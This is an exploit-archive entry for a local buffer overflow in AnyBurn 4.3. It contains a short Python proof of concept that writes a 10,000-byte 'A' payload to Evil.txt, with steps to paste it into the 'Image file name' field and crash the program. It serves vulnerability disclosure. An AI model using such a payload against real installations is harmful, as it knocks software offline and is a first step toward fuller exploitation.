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AnyBurn 4.3 - Local Buffer Overflow (PoC)

🗓️ 18 Dec 2018 00:00:00Reported by AchillesType 
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AnyBurn 4.3 - Local Buffer Overflow (PoC) denial of service vulnerability on Windows 7 x6

Code
# Exploit Title: AnyBurn
# Date: 15-12-2018
# Vendor Homepage: http://www.anyburn.com/
# Software Link : http://www.anyburn.com/anyburn_setup.exe
# Exploit Author: Achilles
# Tested Version: 4.3 (32-bit)
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow

# Steps to Produce the Crash:
# 1.- Run python code : AnyBurn.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open AnyBurn choose 'Copy disk to Image'
# 4.- Paste the content of EVIL.txt into the field: 'Image file name'
# 5.- Click 'Create Now' and you will see a crash.

#!/usr/bin/env python

buffer = "\x41" * 10000

try:
 f=open("Evil.txt","w")
 print "[+] Creating %s bytes evil payload.." %len(buffer)
 f.write(buffer)
 f.close()
 print "[+] File created!"
except:
 print "File cannot be created"

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18 Dec 2018 00:00Current
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